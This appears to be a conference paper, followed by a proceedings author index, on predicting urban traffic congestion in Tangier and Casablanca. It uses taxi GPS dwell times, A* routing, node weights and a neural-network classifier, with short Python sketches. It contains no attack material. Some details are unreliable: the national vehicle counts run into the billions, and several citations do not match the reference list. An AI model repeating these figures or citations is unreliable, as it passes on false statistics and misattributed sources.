Urban traffic congestion has become a serious issue in the development of smart cities due to the rapid advancement of urbanization [1]. It occurs when the demand for transportation exceeds the capacity of the road network, leading to an increase in traffic accidents, serious air pollution, and fuel consumption [2]. According to the European Commission’s estimate, the annual cost of backed-up roads in Europe surpasses 120 billion euros [3]. According to the Moroccan ministry of equipment, transport and logistics, the number of vehicles increased from 2.791.004.000 in 2010 to 4.056.598.000 in 2017 [4]. In addition to affecting public comfort and safety, traffic management practices can result in poor air quality in metropolitan areas, which may have a negative impact on people’s health. Road traffic severely worsens air quality in cities and towns, causing serious pollution problems including smog and carbon monoxide. Due to the rising use of private vehicles, road traffic pollution is acknowledged in practically every country as a severe threat to clean air. The harmful compounds in transportation fumes, which


are released into the atmosphere, produce pollution. Road traffic emissions produce greenhouse gases, which cause global warming [5]. Finding a solution to traffic congestion has become a necessity, and many solutions have been proposed. Travel time prediction has gained more attention in recent years due to its significance as a network performance indicator and its simplicity as a tool for informing drivers about traffic conditions. Several univariate and multivariate approaches have been proposed to model average journey time, with the majority utilizing neural networks. Predicting traffic volume and density is what we define as traffic prediction, and it is typically done to control vehicle movement, ease congestion, and choose the best route. Short-term traffic prediction using neural networks is a topic that is gaining interest, especially since improvements in transportation systems have greatly enhanced the accessibility of enormous amounts of traffic data from multiple sources [6].

2 Related Works
Artificial intelligence and neural networks are promising technologies that provide intelligent, adaptive performance in a variety of application domains, including traffic management and road condition prediction, and different studies have been published in this field. One study [7] proposes an algorithm that uses historical observations of vehicle flow and speed to provide short-term forecasts of these parameters on a stretch of road. This approach is built on a physics-aware recurrent neural network: the network’s architecture incorporates a discretization of a macroscopic traffic flow model that produces estimates and predictions of the flow and speed of moving vehicles, based on estimated and predicted space-time-dependent traffic parameters and physically constrained by the macroscopic traffic flow model. Another interesting study [8] created a virtual graph out of the road segments with the highest significance; this research suggests a deep ensemble neural network (DENN) model to increase the accuracy of urban traffic status predictions.

3 Proposed Solution
Many factors, including infrastructure, car density, and the inadequate quality and capacity of public transportation, contribute to the high degree of traffic congestion in the majority of Moroccan cities. According to the ministry of equipment, transport, and logistics, traffic congestion limits social and sustainable development as well as Moroccan economic growth. In our previous work [9], we developed the Ezzi-traffic app, with which we collected data from more than 15 taxi drivers all over the city of Tangier. Data was collected during all times of the year, as the congestion level can differ from one period of the year to another. Many factors can affect traffic distribution and level, including:
1- Holidays
Vacations take visitors down routes they’ve never traveled before. They become confused, their attention is drawn to the GPS rather than the road, and they make mistakes.


Furthermore, visitors add to the general traffic congestion, as most of them use their private cars to move around the visited city, which leads to a higher congestion level and road saturation. The holidays in Morocco (the studied country) are:
Eid Al Mawlid: 12 and 13 Rabie Al Awwal 1443 (2 days).
Green March: Saturday, November 6, 2021 (1 day).
First holidays and Independence Day: from Sunday, November 14, 2021 to Sunday, November 21, 2021 (8 days).
Second holidays and New Year: from Sunday, December 26, 2021 to Sunday, January 2, 2022 (8 days).
Independence Manifesto: Monday, January 11, 2022 (1 day).
End of semester holidays: from Sunday, February 6, 2022 to Sunday, February 13, 2022 (8 days).
Third holidays: from Sunday, April 03, 2022 to Sunday, April 10, 2022 (8 days).
Labor Day: Sunday, May 1, 2022 (1 day).
Aid El Fitr: from 29 Ramadan to 2 Chaoual 1443 (4 days).
Aid Al Adha: from 8 to 11 Do Al Hija 1443 (days).
The dates of Eid al-Fitr and Eid al-Adha are determined by the lunar calendar and change every year. In 2009–2017, Eid al-Fitr was mostly during the summer and Eid al-Adha was between September and November. Given the significance of these two holidays, it is possible that taxi drivers will either not work or reduce the length of their shifts. This should reduce the number of vehicles in the city, which would reduce congestion on those dates [10].
2- Special days
2-1- Christmas
During Christmas, most countries around the world experience a higher level of traffic congestion from 23 December to 3 January. This increase in traffic flow is caused mostly by leisure trips: according to AAA [11], in the USA alone over 100 million Americans plan to get to their holiday destination by car, and in 2020, 78.5 million hit the road for Christmas and New Year’s. This period sees a high level of mobility, so it is important to take it into consideration while calculating the impact factor.
2-2- Ramadan
During the holy month of Ramadan, the Iftar time is observed throughout the Arab and Muslim world at sundown each day. Iftar is the evening meal when Muslims break their fast, and it is traditionally celebrated by families and communities. Unfortunately, Ramadan is also a time of year when there is a spike in traffic congestion, accidents, deaths, and injuries, with the majority of these accidents occurring either before or during the Iftar meal.


The following behaviors have been reported by traffic policing departments across the MENA region: as the sun sets, there is an increase in traffic congestion and rule violations; roads around malls, mosques, and markets become congested; more drivers speed, disobey traffic signals, and talk on their phones while driving. The following factors could explain this Ramadan road safety concern: fasting during Ramadan causes a significant disruption in one’s daily routine; it has the potential to affect one’s diet and digestion, as well as sleeping patterns [12].
3- Summer
During summer time, not only does the number of tourists increase, but people’s behavior and routine are also different. Summer evenings and nights are the peak time in terms of traffic congestion, as most of the road users are private car users who enjoy driving around the city and exploring it using mostly the same roads, which leads to higher traffic congestion. Summer time is also different because the government shifts into daylight saving time (DST); car accidents and traffic jams decrease when the clock changes to DST and increase when the clock changes back to standard time. This could be explained by the increased amount of light available during the evening rush hour when the clock changes to DST [13].
In this research, using collected nodes that are well distributed all around Tangier and data from taxi drivers, tests were made to select a radius around every node; 50 m was selected as the adequate radius to obtain the most reliable results. To better understand when congestion occurs at a certain node, we split the collected data into 30-minute time frames. For example, for node 0 (Trial atlas), Table 1 shows data entries for taxi 1 every 10 s from 08:00 to 08:30 (30 min): taxi 1 entered node 0’s radius of 50 m at 08:13:20 and went out at 08:16:40, which means that it spent a total of 4 min inside. The congestion index in this particular case is 4. Each graph node and road has a numerical value called a weight associated with it; in our case the weights are non-negative integers, and the weight of a node or a road is referred to as its “cost”. In applications, the cost can represent the length of a route, the capacity of a line, the energy required to transit between nodes along a route, and so on. Applying the previous method to the general map of Tangier, using the average time each driver spent inside a specific node’s radius, is crucial to determine the nodes that experience a high level of congestion. For example, we consider node 0 as i1 and node 1 as j1; to determine cost(i1, j1) we have to calculate cost(i1) and cost(j1):
• cost(i1) is the average time that the studied taxi drivers spend inside the determined radius of node 0 in a certain time frame, which, according to Table 1, is 4 min in the time frame between 08:00 and 08:30.
• cost(j1) is the average time that the studied taxi drivers spend inside the determined radius of node 1, which is, for example, 1 min in the same time frame from 08:00 to 08:30.
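A minimal sketch of the dwell-time computation described above, assuming GPS samples are stored as (latitude, longitude, seconds since midnight) and a node is a (latitude, longitude) pair; the helper names are ours, not taken from the paper:

from math import radians, sin, cos, asin, sqrt

def haversine_m(lat1, lon1, lat2, lon2):
    # Great-circle distance between two GPS points, in meters
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371000 * asin(sqrt(a))

def minutes_inside_node(track, node, radius_m=50.0):
    # Approximate time (in minutes) a taxi spends inside a node's radius:
    # the span between the first and the last sample falling within
    # radius_m of the node, used here as the congestion index.
    inside = [t for lat, lon, t in track
              if haversine_m(lat, lon, node[0], node[1]) <= radius_m]
    return (max(inside) - min(inside)) / 60.0 if inside else 0.0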


Fig. 1. Sheet example of data collected

cost(i1) = 4 and cost(j1) = 1. The cost(i1, j1) can be calculated as shown in Fig. 2:

Cost(i1, j1) = Cost(i1) + Cost(j1) + costdist(i1, j1)

For example, from i1 to j1: between i1 and j1, it took the user from 08:13:20 to 08:16:26 to cross this road, which is approximately 0.051 h. If the time is null its value is eliminated; if it is more than 5 min it is also eliminated, as in that case the vehicle is considered to be parked. The cost of the road between two nodes is defined as the average time spent by users on that road:

costdist(i1, j1) = Σ Time[i1, j1] / Number of drivers


Table 1. Estimated time on [i1, j1]

      X           Y           time
i1    35.762827   -5.838593   08:13:20
      35.763311   -5.838022   08:13:30
      35.763699   -5.837544   08:13:40
      35.764120   -5.837035   08:13:50
      35.764762   -5.836169   08:14:20
      35.765238   -5.83487    08:16:20
j1    35.765926   -5.834450   08:16:26

Table 2. Estimated time on roads for different taxi drivers (time spent per taxi)

Road       Distance   Taxi 1    Taxi 2    ...   Taxi N
[i1, j1]   0.53 km    0.051 h   0.055 h   ...   0.030 h
[i1, j2]   0.88 km    0         0.065 h   ...   0.083 h
[i1, j3]   1.2 km     0.045 h   0.032 h   ...   0.055 h
...        ...        ...       ...       ...   ...
[i, j]     0.66 km    0.040 h   0.029 h   ...   0.052 h

The average speed inside urban areas is considered to be 40 km/h; the ideal time from A to B is calculated using ideal values, considering that the distance is 0.53 km and the speed is 40 km/h.

Considering road [i1, j1], costdist(i1, j1) is:

(0.051 + 0.055 + 0.030) / 3 = 0.136 / 3 ≈ 0.045 h ≈ 2.7 min

costdist(i1, j1) = 2.7 min

As calculated previously, cost(i1) = 4 and cost(j1) = 1. The total cost of going from node 0 to node 1 is:

cost(i1, j1) = cost(i1) + cost(j1) + costdist(i1, j1) = 4 + 1 + 2.7 = 7.7
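The calculation above can be reproduced with a short sketch (our own illustration; the filtering of null values and of stops longer than 5 min is assumed to have been done beforehand):

def road_cost(cost_i, cost_j, times_h):
    # Total cost of going from node i to node j:
    # cost(i, j) = cost(i) + cost(j) + costdist(i, j),
    # where costdist is the average time (converted to minutes) the taxis
    # spent on the road [i, j].
    costdist_min = sum(times_h) / len(times_h) * 60.0
    return cost_i + cost_j + costdist_min

# Worked example from the text: cost(i1) = 4, cost(j1) = 1 and the
# recorded times 0.051 h, 0.055 h and 0.030 h give a total cost of 7.7
print(round(road_cost(4, 1, [0.051, 0.055, 0.030]), 1))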


Table 3. Weight for SC1 nodes

Order of node   Id of node   Weight
1               143          19
2               202          18
3               35           18
4               4            16
5               198          12
...             ...          ...
140             56           9
141             101          3
...             ...          ...
208             9            2

Table 4. Weight for SG2 nodes

Order of node   Id of node   Weight
1               52           21
2               157          20
3               123          17
4               201          13
5               47           12
...             ...          ...
140             93           12
141             107          10
...             ...          ...
208             130          3

Figure 2 demonstrates how the cost calculations are done. After computing the exact cost of every node, we were able to calculate the cost between any two nodes and, based on it and using the A* algorithm, to determine the shortest road based on:
• Vehicle speed
• Time
• Source
• Destination


The function path() is responsible for defining the best road to go through: it receives the vehicle speed, the time, the source node and the destination node and, based on these, it suggests the best road to take to avoid congestion. A basic version of a mobile application was developed by our team to present the algorithm’s results and to suggest the shortest road that the users of this application can take, based on the selected source and destination nodes in a certain time slot. This application uses our algorithm’s API in online mode and downloaded text files in offline mode. As the data is divided into different 30-minute time frames during the day, starting from 08:00 in the morning, the text files are also divided in the same way: the cost of every node and road is saved into a text file, and when a call is made from the app, the time is automatically detected and the data is retrieved from the file that corresponds to that specific time frame. If a user starts his journey in one time frame and the journey ends in another, data is retrieved according to the time and the results are updated continually depending on the new data.
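The paper does not list the path() implementation; the following is a hypothetical sketch of how it could combine the node and road costs with A*, assuming graph[u] maps a neighbor v to costdist(u, v) in minutes for the current time frame, node_cost[u] is the node's cost in minutes, and coords[u] is the node position in kilometres. The straight-line travel time at the urban speed is used as an optimistic heuristic under the 40 km/h assumption:

import heapq

def path(graph, node_cost, coords, source, destination, speed_kmh=40.0):
    # Heuristic: straight-line travel time (in minutes) at the assumed
    # urban speed, intended not to overestimate the remaining cost.
    def h(u):
        (x1, y1), (x2, y2) = coords[u], coords[destination]
        return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5 / speed_kmh * 60.0

    open_set = [(h(source), 0.0, source, [source])]
    best = {source: 0.0}
    while open_set:
        _, g, u, route = heapq.heappop(open_set)
        if u == destination:
            return route, g
        for v, costdist in graph[u].items():
            g2 = g + node_cost[u] + node_cost[v] + costdist   # cost(u, v)
            if g2 < best.get(v, float("inf")):
                best[v] = g2
                heapq.heappush(open_set, (g2 + h(v), g2, v, route + [v]))
    return None, float("inf")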

Fig. 2. Cost calculation method

Fig. 3. Basic representation of graph


The establishment of a ‘balanced distribution’ of nodes is very important in this study: covering the entire city territory and including all important intersections and traffic points is crucial to achieve better results. Figures 4 and 5 are graphic representations of Tangier’s map and Casablanca’s map, which also show the positions of some of the selected nodes in both cities.

Fig. 4. Tangier’s map with nodes’ positions

The elements taken into consideration in both cities are:
• Number of schools.
• Number of supermarkets.
• Number of restaurants.
Determining the number of schools, supermarkets and restaurants in each city could not be done manually, as the system should be automatic. Using a Python-based Google Maps data scraper developed by our team, we were able to scrape all the data for both Tangier and Casablanca, the two cities concerned by our study at this stage of the research; the scraper is able to generate the same information for any other city around the world. The factors that impact the road condition on a segment [A, B] are:
• Node type: the type of node available in all cities is one of three options: light intersection, traffic point, normal intersection (no light).
• Number of exits: in the data collection phase, along with the nodes’ positions, each node’s number of exits was extracted too. Node A in Fig. 6, for example, has 4 exits.


Fig. 5. Casablanca’s map with nodes’ positions

• Length of exits: in the data collection phase, along with the number of exits, each node’s number of entries was extracted too. Node A in Fig. 6, for example, has 4 entries.
• Road capacity: every node has different exits and entries, and the road density means the density of the roads that lead in and out of that specific node’s radius. The impact of density is simple: the higher the road density, the less congestion occurs. We calculate the road capacity in the worst-case scenario, considering d to be the distance between two vehicles and W the road’s width, as it determines how many lanes each road has (in urban areas a normal lane is around 3 m wide). We also consider £ to be the road’s length:

Capacity = £ / (4.6 + d)

Using the node type, number of exits, length of exits and road capacity, the algorithm calculates the weight of each node:

Weight = NodeType × α + (Nbr_exits + Nbr_entries) × β + Capacity × μ

with:
• α: importance of the node type
• β: importance of the number of exits
• μ: importance of the capacity
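A minimal sketch of the capacity and weight formulas above and of the SC1-to-SG2 matching described next; the numeric encoding of the node type and the default importance coefficients are assumptions of ours:

def road_capacity(length_m, gap_m):
    # Worst-case capacity: road length divided by the space one vehicle
    # occupies (4.6 m plus the inter-vehicle gap d)
    return length_m / (4.6 + gap_m)

def node_weight(node_type, nbr_exits, nbr_entries, capacity,
                alpha=1.0, beta=1.0, mu=1.0):
    # Weight = NodeType*alpha + (exits + entries)*beta + Capacity*mu
    return node_type * alpha + (nbr_exits + nbr_entries) * beta + capacity * mu

def match_nodes(sc1_weights, sg2_weights):
    # Sort both node sets by descending weight and pair them position by
    # position; ties simply keep insertion order here, standing in for the
    # random association mentioned in the text.
    order = lambda w: sorted(w, key=w.get, reverse=True)
    return dict(zip(order(sc1_weights), order(sg2_weights)))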


In this research, the weight of each node is calculated using the formula above; once the weights are calculated, all nodes are added to a list in descending order, starting with the node that has the biggest weight, for both SC1 and SG2. The algorithm uses the order of the nodes to match each node from SC1 to the corresponding node from SG2. In case of equal weights, the node is associated randomly with one of the equally weighted nodes from SG2.
Neural Networks to Predict Traffic Condition
Neural networks are computing systems with interconnected nodes that work much like neurons in the human brain. They can cluster and categorize raw data using algorithms, identify hidden patterns and correlations in it, and, with time, continually learn and improve. Neural networks are also perfectly suited to assisting individuals in resolving challenging issues in practical settings.

Fig. 6. Representation of road scheme

They can discover hidden correlations, patterns, and forecasts; learn and model nonlinear, complicated interactions between inputs and outputs; and model highly volatile data (like financial time series data) and variances required to forecast sporadic events (such as fraud detection).


Neural networks can thereby enhance decision-making in areas like:
• Medicare fraud detection and credit card fraud.
• Transportation network logistics optimization.
• Natural language processing, also referred to as character and speech recognition.
• Disease and medical diagnosis.
• Targeted advertising.
• Financial forecasting of stock prices, currency, options, futures, bankruptcy, and bond ratings.
• Robot controls.
• Forecasting of electrical load and energy demand.
• Quality and process control.
• Identification of chemical substances.
• Ecosystem assessment.
• Using computer vision to analyze unprocessed images and videos (for example, in medical imaging, robotics and facial recognition).

In our study we propose a neural network system that is based on road features, which we identify as:
• Type of the day (holidays, ...)
• Time (morning, afternoon, ...)
• Elements with an impact factor (schools, hospitals, restaurants, ...)
Based on our previous work, each road segment [A, B] is defined with specific features and elements that can contribute to the congestion problem that might happen on that certain segment of the road.


We collected data from various drivers that used our application Ezzi-traffic, in which we identified different road segments as Fluid (F), MediumFluid (MF) or NonFluid (NF); this labeling helped us create our neural network system.

The corresponding network takes the segment features F1, ..., Fn as inputs and outputs one of the classes F, MF or NF.
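The paper does not specify the network architecture; as a minimal sketch, assuming the features are encoded numerically (day type, time slot, counts of impact elements, road capacity) and that scikit-learn is available, a small multilayer perceptron can be trained on labelled segments. The toy feature values and the layer sizes below are illustrative assumptions:

from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline

# Each row encodes one road segment [A, B] in one time slot:
# [day_type, time_slot_h, nb_schools, nb_supermarkets, nb_restaurants, capacity]
X = [
    [0, 8.0, 2, 1, 3, 40.0],    # working day, 08:00
    [1, 8.0, 2, 1, 3, 40.0],    # holiday, 08:00
    [0, 18.5, 0, 2, 5, 25.0],   # working day, 18:30
    [1, 22.0, 0, 0, 1, 60.0],   # holiday, 22:00
]
y = ["NF", "MF", "NF", "F"]     # observed labels: Fluid / MediumFluid / NonFluid

model = make_pipeline(
    StandardScaler(),
    MLPClassifier(hidden_layer_sizes=(16, 8), max_iter=2000, random_state=0),
)
model.fit(X, y)
print(model.predict([[0, 8.5, 2, 1, 3, 40.0]]))   # predicted road condition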

4 Conclusion
In metropolitan areas, especially during times of peak demand, congestion is unavoidable and, within some bounds, may even be desirable, because the costs associated with it are lower than those needed to completely eliminate it. Completely eliminating traffic congestion would incur costs such as investments in expanding road capacity, which may outweigh the costs of moderate levels of congestion, and costs brought on by diverting traffic to alternative routes, modes of transportation, or travel times. The main objective of our study is to ensure the safety of people who live in congested locations and to help decrease the strain on key nodes during specific time windows with our technology. To do this, we first developed a functioning model for one city and then applied it to additional cities, taking advantage of the similarities in the roads and infrastructures of most significant Moroccan cities. The growth of computer science and the accessibility of big data have encouraged academics to apply a variety of models in this area; nevertheless, the majority of these solutions either failed to accurately predict traffic congestion or did not give drivers a simple platform to use to avoid it. The neural network approach can be very interesting for solving the congestion problem, as it can help predict congestion in areas where no data was collected: using only the features of that area during different seasons of the year and different times of the day, we can predict the road condition.


References
1. Lu, J., Li, B., Li, H., Al-Barakani, A.: Expansion of city scale, traffic modes, traffic congestion, and air pollution. Cities 108, Article 102974 (2021)
2. Zheng, F., Van Zuylen, H.: Urban link travel time estimation based on sparse probe vehicle data
3. Roncoli, C., Papageorgiou, M., Papamichail, I.: Traffic flow optimisation in presence of vehicle automation and communication systems – Part I: A first-order multi-lane model for motorway traffic
4. http://www.equipement.gov.ma/en/Pages/home.aspx
5. https://www.environmentlaw.org.uk/rte.asp?id=38
6. Zhua, Z., Zhang, A., Zhang, Y.: Connectivity of intercity passenger transportation in China: a multi-modal and network approach
7. Pereira, M., Lang, A., Kulcsár, B.: Short-term traffic prediction using physics-aware neural networks
8. Lu, W., Yi, Z., Wu, R., Rui, Y., Ran, B.: Traffic speed forecasting for urban roads: a deep ensemble neural network model
9. Benmessaoud, Y., Cherrat, L., Bennouna, M., Ezziyani, B.: Intelligent live traffic models decision support for driving directions and road conditions updates
10. Shefer, D.: Congestion, air pollution, and road fatalities in urban areas. Accid. Anal. Prev. 26(4), 501–509 (1994)
11. Sandiputra, R., Risangayu, T.: Traffic congestion to shift during Ramadan
12. Bink, A.: Nexstar Media Wire: These are the worst times to travel on the roads for Christmas and New Year’s
13. Murat Kalafat, U., Topacoglu, H., Dikme, O., Dikme, O., Sadillioglu, S., Orfi Erdede, M.: Evaluation of the impact of the month of Ramadan on traffic accidents

Author Index

A Abdellah, Najid 339 Abdellatif, Ben Abdellah 15 Abdoun, Otman 348 Adnane, Latif 320 Ahmadi, Adnan El 348 Ahmed, Drissi 132 Ait Bouslam, Karima 118 Amadid, Jamal 118 Anas, Hatim 320 Ariss, Anass 40 Aroussi, Hatim Kharraz 9, 199 Arqane, Aouatif 1 Arroub, Omar 179 Assad, Noureddine 168 Ayoub, Zougari 15 Azizi, Mostafa 205 B Barhami, Yasmine El 199 Belhiah, Meryam 328 Belkasmi, Mohammed Ghaouth 302 Ben Chakra, Fatima Zohra 230 Bencharef, Omar 55 Benfssahi, Mouna 73 Benmessaoud, Youssef 418 Bensaid, Chaimae 199 Boughardini, Imane El 93 Boujrad, Mouna 390 Boukabous, Mohammed 205 Boukhriss, Hicham 1 Boukili, A. E. 377 Boumait, El Mahdi 266 Boutkhoum, Omar 1 C Chentouf, Abdellah 404 Cherkaoui, Abdeljabbar 64 Cherrat, Loubna 404, 418

Chhaybi, Akram 145 Chihab, Younes 55 D Dadda, Afaf 282 Dahbi, Aziz 168 Darif, Anouar 179 Douae, Tizniti 310 E Ech-charrat, Mohamed Rida 418 Ech-charrat, Mohammed Rida 404 El Akkad, Nabil 230 El Gadrouri, Rachid 251 El Hamdouni, Mohamed 214 El Kafhali, Said 240 El Mane, Adil 55 El Moudden, Ibrahim 404 El Moutaouakkil, Abdelmajid 1 Ennejjai, Imane 40 Ezzine, Latifa 282 Ezziyyani, Mostafa 40, 404, 418 F Farouq, Saloua 220 Felsoufi, Zoubir El 73 G Grari, Mounir 205 H Habbani, Ahmed 266 Haddach, Abdelhay 73 Haimoudi, El Khatir 348 Hairech, Oumaima El 296 Hajar, Rhylane 15 Hanini, Mohamed 191, 240 Haqiq, Abdelkrim 191 Hassan, Badir 310


Hassaoui, Mohamed 240 Hassine, Mohammed 145 I Ibnatta, Youssef 152 Idrissi, Idriss 205 Iqdour, Radouane 118 J Jamali, Abdellah 368

K Kasmi, Mohammed Amine 390 Khaldoun, Mohammed 152 Khalil, Amal 302 Kharmoum, Nassim 40 Korchiyne, Redouan 55 L Laaychi, Abdelaziz 107, 272 Labiad, Bochra 107, 272 Lamsellak, Hajar 302 Lazaar, Saiida 145 Lebhar, Ikram 282 Lyhyaoui, Abdelouahid 107, 272, 296 M Mansour, N. 377 Mastrouri, Reda 266 Mechkouri, Meriem Hayani 93 Mekki, Youssef 168 Meriem, Afilal 320 Mesmoudi, Yasser 214 Mohamed, El Alami 132 Mohtadi, Hibat Eallah 191 Moujahdi, Chouaib 168 Moumkine, Noureddine 359 Moumoun, Lahcen 368 Mounia, Ajdour 15 Mounir, Arioua 320 Moussaoui, Mimoun 205 Moussaoui, Omar 205

N Naim, Soufiane 359 Nezha, El Idrissi 339 O Oubelkas, Farah 368 Ouerdi, Noura 390 R Rachid, Filali Moulay 29 Rachid, Hdidou 132 Rahmani, Moly Driss 179 Raissouni, Fatima Zahra 64 Reklaoui, Kamal 93 Rhalem, Wajih 40, 404 Rziki, M. H. 377 S Saadane, Rachid 179 Saber, Mohammed 302 Sadik, Mohammed 152 Sadiqui, Ali 29 Sadki, Nordine 73 Sedra, M. B. 377 Soulhi, Aziz 220 T Tahiri Alaoui, Moulay Lakbir 328 Tahiri, Abderrahim 214 Tajini, Reda 220 Tanana, Mariam 107, 272 Touil, Hamza 230 Y Yandouzi, Mimoun 205 Yassine, Rayri 9 Z Zenzoum, Omar 9 Zeroual, Abdelouhab 118 Ziti, Soumia 40, 328